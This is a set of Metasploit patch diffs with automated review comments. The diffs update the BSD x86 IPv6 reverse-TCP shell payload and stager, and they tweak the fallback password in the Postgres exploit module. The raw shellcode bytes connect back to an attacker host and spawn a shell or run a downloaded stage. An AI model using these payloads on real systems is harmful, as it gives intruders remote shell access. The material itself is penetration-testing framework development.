a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb 
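Review bot: The rewritten `read:` still issues exactly one `read(socket, buf, 4096)` and then `ret`s into the buffer (the `push ecx ; Buffer to Return` slot) without consulting the byte count in eax, so a stage larger than 4 KiB, or one that arrives split across TCP segments, is executed truncated; `; Points to 4096 stack buffer` would be more useful as `; 4096-byte stack buffer: the stage must arrive whole in ONE read() - no loop, no length check`, and a length-prefixed read loop is the real fix if larger stages are ever expected. `mov al, 0x3` also relies on eax's upper bytes being zero after connect(), i.e. on connect() having returned 0 or a small errno, and a failed connect() is never detected — both deserve a comment. `; Return` on the final `ret` says nothing; `; pop buffer address -> jump into the stage just read` is what actually happens.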
@@ -35,18 +35,17 @@ module Metasploit3 { 'Offsets' => { - 'LHOST' => [ 43, 'ADDR6' ], + 'LHOST' => [ 42, 'ADDR6' ], 'LPORT' => [ 36, 'n' ], - 'SCOPEID' => [ 59, 'V' ] + 'SCOPEID' => [ 58, 'V' ] }, 'Payload' => "\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" + - "\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" + - "\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x40\x41\x42\x43\x45\x46" + - "\x47\x48\x49\x4a\x4b\x4d\x4e\x4f\x50\x51\x00\x00\x00\x00\x6a\x02" + + "\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" + + "\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x6a\x02" + "\x59\xb0\x5a\x51\x57\x51\xcd\x80\x49\x79\xf6\x50\x68\x2f\x2f\x73" + - "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80" - + "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80" } )) register_options([ diff --git a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb index 0e18bbd936..1a67caf5ec 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb @@ -45,16 +45,18 @@ module Metasploit3 { 'Offsets' => { - 'LHOST' => [ 43, 'ADDR6' ], + 'LHOST' => [ 42, 'ADDR6' ], 'LPORT' => [ 36, 'n' ], - 'SCOPEID' => [ 59, 'V' ] + 'SCOPEID' => [ 58, 'V' ] }, 'Payload' => + "\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" + "\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" + - "\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x40\x41\x42\x43\x45\x46" + - "\x47\x48\x49\x4a\x4b\x4d\x4e\x4f\x50\x51\x00\x00\x00\x00\xb0\x03" + - "\xc6\x41\xfd\x10\xcd\x80\xc3" + "\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x6a\x10" + + "\x5a\xc1\xe2\x08\x29\xd4\x89\xe1\x52\x51\x57\x51\xb0\x03\xcd\x80" + + "\xc3" } )) register_options([ 
From 46d40b89a5ea05d0b125d012f88887dfd764548e Mon Sep 17 00:00:00 2001 From: HD Moore Date: Wed, 1 Feb 2012 02:08:26 -0600 Subject: [PATCH 6/6] Make sure at least one character is returned --- lib/msf/core/exploit/postgres.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb index 3d9f8daea1..8b805d24ba 100644 --- a/lib/msf/core/exploit/postgres.rb +++ b/lib/msf/core/exploit/postgres.rb @@ -245,7 +245,7 @@ module Exploit::Remote::Postgres if datastore['PASSWORD'].to_s.size > 0 datastore['PASSWORD'].to_s else - 'INVALID_' + Rex::Text.rand_text_alpha(rand(6)) + 'INVALID_' + Rex::Text.rand_text_alpha(rand(6) + 1) end end
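Review bot: The change is only understandable with the commit title in hand: `rand(6)` yields 0..5, so before this patch the random suffix could be empty, yet `'INVALID_' + ''` is still a non-empty 8-character string, so "at least one character is returned" must refer to something else (presumably `Rex::Text.rand_text_alpha(0)` misbehaving, or a consumer that needs the fallback password to vary) and the code does not say which. A one-line comment above the `else` branch would spare the next reader the archaeology, e.g. `# rand(6) may be 0: keep the random suffix non-empty so the fallback password is never a fixed string` — or whatever the actual motivation was. The enclosing method's `def` line lies outside the hunk.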